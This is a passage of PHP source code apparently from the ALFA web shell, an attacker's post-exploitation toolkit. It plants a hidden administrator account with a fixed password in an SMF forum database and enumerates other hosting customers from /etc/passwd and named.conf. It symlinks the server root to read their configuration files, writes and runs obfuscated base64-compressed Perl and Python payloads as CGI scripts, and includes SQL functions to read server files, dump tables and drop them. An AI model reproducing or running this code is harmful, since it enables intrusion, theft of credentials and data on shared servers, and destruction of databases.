        echo __pre() . '<center><center><div class="txtfont_header">| SMF |</div><p><p>' . getConfigHtml('smf') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa5'];
            $password = $_POST['alfa6'];
            $prefix = $_POST['alfa7'];
            $admin = $_POST['alfa8'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $setpwAlg = sha1(strtolower($admin) . 'solevisible');
            $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'{$admin}','1','{$admin}','{$setpwAlg}','solevisible@fbi.gov')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaMakePwd()
{
    if (_alfa_file_exists("/etc/virtual/domainowners") || _alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")) {
        return "/home/{user}/public_html/";
    }
    $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
    $public = end($document);
    array_pop($document);
    array_pop($document);
    $path = implode("/", $document) . "/{user}/" . $public;
    return $path;
}
function alfaGetDomains($state = false)
{
    $state = "named.conf";
    $lines = array();
    $lines = _alfa_file('/etc/named.conf');
    if (!$lines) {
        $lines = @scandir("/etc/valiases/");
        $state = "valiases";
        if (!$lines) {
            $lines = @scandir("/var/named");
            $state = "named";
            if (!$lines && $state) {
                $lines = _alfa_file('/etc/passwd');
                $state = "passwd";
            }
        }
    }
    return array("lines" => $lines, "state" => $state);
}
function alfasymlink()
{
    alfahead();
    AlfaNum(9, 10);
    echo "<div class=header><br><center><div class=\"txtfont_header\">| Symlink |</div><center><h3><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symphp')\">| Symlink( php ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symperl')\">| Symlink( perl ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'sympy')\">| Symlink( python ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,null,null,'SymFile')\">| File Symlink | </a></h3></center>";
    if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST["alfa2"] == "sympy")) {
        $sympath = alfaMakePwd();
        @mkdir('cgialfa', 0755);
        @chdir('cgialfa');
        alfacgihtaccess('cgi');
        $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));";
        $py = "#!/usr/bin/python\nimport zlib, base64\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
        $cginame = "symperl.alfa";
        $source = $perl;
        $lang = "perl";
        if ($_POST["alfa2"] == "sympy") {
            $cginame = "pysymlink.alfa";
            $source = $py;
            $lang = "python";
        }
        @__write_file($cginame, $source);
        @chmod($cginame, 0755);
        echo __pre();
        $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
        if (strlen($resource) == 0) {
            echo AlfaiFrameCreator('cgialfa/' . $cginame);
        } else {
            echo $resource;
        }
    }
    if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile') {
        if (function_exists('symlink') || _alfa_can_runCommand(true, true)) {
            AlfaNum(9, 10);
            echo __pre() . '
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
            $path = $_POST['alfa5'];
            $symname = $_POST['alfa6'];
            $solevisible58 = $_POST['alfa7'];
            if ($solevisible58) {
                $new_name = str_replace(".", "_", basename($symname));
                $rand_dir = $new_name . rand(111, 9999);
                $sym_dir = 'alfasymlinkphp/' . $rand_dir . '/';
                @mkdir($sym_dir, 0777, true);
                alfacgihtaccess('sym', $sym_dir, $symname);
                _alfa_symlink("{$path}", "{$sym_dir}/{$symname}");
                echo __pre();
                echo '<center><b><font color="white">Click >> </font><a target="_blank" href="' . $sym_dir . '" ><b><font size="4">' . $symname . '</font></b></a></b></center>';
            }
        } else {
            echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
        }
    }
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp') {
        $cant_symlink = true;
        if (function_exists('symlink') || _alfa_can_runCommand(false, false)) {
            @mkdir('alfasymlink', 0777);
            alfacgihtaccess('sym', 'alfasymlink/');
            _alfa_symlink('/', 'alfasymlink/root');
            $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
            if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) {
                echo "<center>";
                $lines = array();
                $anony_domains = array();
                $anonymous_users = array();
                $f_black = array();
                $error = false;
                $anonymous = false;
                $makepwd = "/home/{user}/public_html/";
                $domains = alfaGetDomains();
                $lines = $domains["lines"];
                $state = $domains["state"];
                $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
                $can_runcmd = _alfa_can_runCommand(false, false);
                if (!$is_posix && !$can_runcmd) {
                    $anonymous = true;
                    $anony_domains = $domains["lines"];
                    $lines = _alfa_file('/etc/passwd');
                }
                echo $table_header;
                $count = 1;
                $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
                foreach ($lines as $line) {
                    $domain = "";
                    $owner = "";
                    if ($anonymous) {
                        $explode = explode(":", $line);
                        $owner = $explode[0];
                        $owner_len = strlen($owner) - 1;
                        $userid = $explode[2];
                        if ((int) $userid < 500) {
                            continue;
                        }
                        $domain = "[?????]";
                        $temp_black = array();
                        $finded = false;
                        foreach ($anony_domains as $anony) {
                            if ($state == "named.conf") {
                                if (@strstr($anony, 'zone')) {
                                    preg_match_all('#zone "(.*)"#', $anony, $data);
                                    $domain = $data[1][0];
                                } else {
                                    continue;
                                }
                            } elseif ($state == "named" || $state == "valiases") {
                                if ($anony == "." || $anony == "..") {
                                    continue;
                                }
                                if ($state == "named") {
                                    $anony = rtrim($anony, ".db");
                                }
                                $domain = $anony;
                            }
                            $sub_domain = str_replace(array("-", "."), "", $domain);
                            if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) {
                                if (in_array($owner . $domain, $temp_black)) {
                                    continue;
                                }
                                $sympath = str_replace("{user}", $owner, $makepwd);
                                $http = "http://" . $domain;
                                echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                                $count++;
                                $temp_black[] = $owner . $domain;
                                $finded = true;
                            }
                        }
                        if (!$finded) {
                            $anonymous_users[] = $owner;
                        }
                    } else {
                        if ($state == "named.conf") {
                            if (@strstr($line, 'zone')) {
                                preg_match_all('#zone "(.*)"#', $line, $data);
                                $domain = $data[1][0];
                            } else {
                                continue;
                            }
                        } elseif ($state == "named" || $state == "valiases") {
                            if ($line == "." || $line == "..") {
                                continue;
                            }
                            if ($state == "named") {
                                $line = rtrim($line, ".db");
                            }
                            $domain = $line;
                        }
                        if (strlen(trim($domain)) > 2 && $state != "passwd") {
                            if (!_alfa_file_exists('/etc/valiases/' . $domain, false)) {
                                continue;
                            }
                            if ($is_posix) {
                                $user = @posix_getpwuid(@fileowner('/etc/valiases/' . $domain));
                                $owner = $user["name"];
                            } elseif ($can_runcmd) {
                                $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false);
                            }
                        }
                    }
                    if (!$anonymous) {
                        if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) {
                            continue;
                        }
                        $sympath = str_replace("{user}", $owner, $makepwd);
                        $http = "http://" . $domain;
                        if ($state == "passwd") {
                            $http = "javascript:alert('we cant find domain...')";
                        }
                        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                        $count++;
                        $f_black[] = $owner . $domain;
                    }
                }
                if ($anonymous) {
                    foreach ($anonymous_users as $owner) {
                        $sympath = str_replace("{user}", $owner, $makepwd);
                        $http = "javascript:alert('we cant find domain...')";
                        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
                        $count++;
                    }
                }
                $cant_symlink = false;
            } else {
                $is_direct = false;
                $makepwd = alfaMakePwd();
                if (_alfa_file_exists("/etc/virtual/domainowners")) {
                    $makepwd = "/home/{user}/public_html";
                    $is_direct = true;
                }
                $sole = _alfa_file("/etc/virtual/domainowners");
                $count = 1;
                echo $table_header;
                $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
                if ($sole) {
                    foreach ($sole as $visible) {
                        if (@strstr($visible, ":")) {
                            $solevisible = explode(':', $visible);
                            $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
                            echo str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
                        }
                    }
                } else {
                    $passwd = _alfa_file("/etc/passwd");
                    if ($passwd) {
                        $html = "";
                        $is_named = false;
                        $users = array();
                        $domains = array();
                        $uknowns = array();
                        foreach ($passwd as $user) {
                            $user = trim($user);
                            $expl = explode(":", $user);
                            if ((int) $expl[2] < 500) {
                                continue;
                            }
                            $users[$expl[0]] = $expl[5];
                        }
                        $site_domains = @scandir("/etc/virtual/");
                        if (!$site_domains) {
                            $site_domains = alfaEx("ls /etc/virtual/");
                            $site_domains = explode("\n", $site_domains);
                            if (!$site_domains) {
                                $site_domains = _alfa_file("/etc/named.conf");
                                if ($site_domains) {
                                    $is_named = true;
                                }
                            }
                        }
                        foreach ($site_domains as $line) {
                            if ($is_named) {
                                if (@strstr($line, 'zone')) {
                                    preg_match_all('#zone "(.*)"#', $line, $data);
                                    $domain = $data[1][0];
                                    if (strlen($domain > 2) && !empty($domain)) {
                                        $domains[] = $domain;
                                    }
                                }
                            } else {
                                $domains[] = $line;
                            }
                        }
                        $x = 1;
                        foreach ($users as $user => $home) {
                            foreach ($domains as $domain) {
                                $user_len = strlen($user) - 1;
                                $sub_domain = str_replace(array("-", "."), "", $domain);
                                $five_user = substr($user, 0, $user_len);
                                $five_domain = substr($sub_domain, 0, $user_len);
                                if ($five_user == $five_domain) {
                                    if ($is_direct) {
                                        $cwd = str_replace("{user}", $user, $makepwd);
                                    } else {
                                        $expl = explode("}/", $makepwd);
                                        $cwd = $home . "/" . $expl[1];
                                    }
                                    $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
                                } else {
                                    $uknowns[$user] = $home;
                                }
                            }
                        }
                        $uknowns = array_unique($uknowns);
                        foreach ($uknowns as $user => $home) {
                            if ($is_direct) {
                                $cwd = str_replace("{user}", $user, $makepwd);
                            } else {
                                $expl = explode("}/", $makepwd);
                                $cwd = $home . "/" . $expl[1];
                            }
                            $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
                        }
                        echo $html;
                    }
                }
                echo "</table>";
                $cant_symlink = false;
            }
        } else {
            echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
            $cant_symlink = false;
        }
        if ($cant_symlink) {
            echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><font color=\"#FFFFFF\">Error...</font></b><br>";
        }
        echo "</center></table>";
    }
    echo "</div>";
    alfafooter();
}
function alfasql()
{
    if (!isset($_POST['sql_host'])) {
        $_POST['sql_host'] = $_SESSION["sql_host"];
        $_POST['sql_login'] = $_SESSION["sql_login"];
        $_POST['sql_pass'] = $_SESSION["sql_pass"];
        $_POST['sql_base'] = $_SESSION["sql_base"];
    }
    class DbClass
    {
        public $type;
        public $link;
        public $res;
        function __construct($type)
        {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname)
        {
            switch ($this->type) {
                case 'mysql':
                    if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) {
                        return true;
                    }
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if (!$host[1]) {
                        $host[1] = 5432;
                    }
                    if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
                        return true;
                    }
                    break;
            }
            return false;
        }
        function selectdb($db)
        {
            switch ($this->type) {
                case 'mysql':
                    if (@mysqli_select_db($db)) {
                        return true;
                    }
                    break;
            }
            return false;
        }
        function query($str)
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->res = @mysqli_query($this->link, $str);
                case 'pgsql':
                    return $this->res = @pg_query($this->link, $str);
            }
            return false;
        }
        function fetch()
        {
            $res = func_num_args() ? func_get_arg(0) : $this->res;
            switch ($this->type) {
                case 'mysql':
                    return @mysqli_fetch_assoc($res);
                case 'pgsql':
                    return @pg_fetch_assoc($res);
            }
            return false;
        }
        function listDbs()
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->query("SHOW databases");
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
            }
            return false;
        }
        function listTables()
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
            }
            return false;
        }
        function error()
        {
            switch ($this->type) {
                case 'mysql':
                    return @mysqli_error($this->link);
                case 'pgsql':
                    return @pg_last_error();
            }
            return false;
        }
        function setCharset($str)
        {
            switch ($this->type) {
                case 'mysql':
                    if (function_exists('mysql_set_charset')) {
                        return @mysqli_set_charset($this->link, $str);
                    } else {
                        $this->query('SET CHARSET ' . $str);
                    }
                    break;
                case 'pgsql':
                    return @pg_set_client_encoding($this->link, $str);
            }
            return false;
        }
        function loadFile($str)
        {
            switch ($this->type) {
                case 'mysql':
                    return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
                case 'pgsql':
                    $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;");
                    $r = array();
                    while ($i = $this->fetch()) {
                        $r[] = $i['file'];
                    }
                    $this->query('drop table solevisible');
                    return array('file' => implode("\n", $r));
            }
            return false;
        }
        function dump($table, $fp = false)
        {
            switch ($this->type) {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
                    $create = mysqli_fetch_array($res);
                    $sql = $create[1] . ";\n";
                    if ($fp) {
                        fwrite($fp, $sql);
                    } else {
                        echo $sql;
                    }
                    $this->query('SELECT * FROM `' . $table . '`');
                    $head = true;
                    while ($item = $this->fetch()) {
                        $columns = array();
                        foreach ($item as $k => $v) {
                            if ($v == null) {
                                $item[$k] = "''";
                            } elseif (is_numeric($v)) {
                                $item[$k] = $v;
                            } else {
                                $item[$k] = "'" . @mysqli_real_escape_string($this->link, $v) . "'";
                            }
                            $columns[] = "`" . $k . "`";
                        }
                        if ($head) {
                            $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
                            $head = false;
                        } else {
                            $sql = "\n\t,(" . implode(", ", $item) . ')';
                        }
                        if ($fp) {
                            fwrite($fp, $sql);
                        } else {
                            echo $sql;
                        }
                    }
                    if (!$head) {
                        if ($fp) {
                            fwrite($fp, ";\n\n");
                        } else {
                            echo ";\n\n";
                        }
                    }
                    break;
                case 'pgsql':
                    $this->query('SELECT * FROM ' . $table);
                    while ($item = $this->fetch()) {
                        $columns = array();
                        foreach ($item as $k => $v) {
                            $item[$k] = "'" . addslashes($v) . "'";
                            $columns[] = $k;
                        }
                        $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
                        if ($fp) {
                            fwrite($fp, $sql);
                        } else {
                            echo $sql;
                        }
                    }
                    break;
            }
            return false;
        }
    }
    $db = new DbClass($_POST['type']);
    if (@$_POST['alfa1'] == 'dumpfile' || @$_POST['alfa1'] == 'droptbl') {
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        switch ($_POST['charset']) {
            case "Windows-1251":
                $db->setCharset('calfa1251');
                break;
            case "UTF-8":
                $db->setCharset('utf8');
                break;
            case "KOI8-R":
                $db->setCharset('koi8r');
                break;
            case "KOI8-U":
                $db->setCharset('koi8u');
                break;
            case "calfa866":
                $db->setCharset('calfa866');
                break;
        }
        $json = json_decode($_POST['alfa2'], true);
        if (count($json['tbl']) > 0) {
            if ($_POST['alfa1'] == 'dumpfile') {
                if ($fp = @fopen($json['file'], 'w')) {
                    foreach ($json['tbl'] as $v) {
                        $db->dump($v, $fp);
                    }
                    fclose($fp);
                    $dumpStatus = true;
                }
            } else {
                foreach ($json['tbl'] as $v) {
                    $db->query('DROP TABLE ' . $v);
                }
            }
        }
        unset($_POST['alfa2']);
    }
    alfahead();
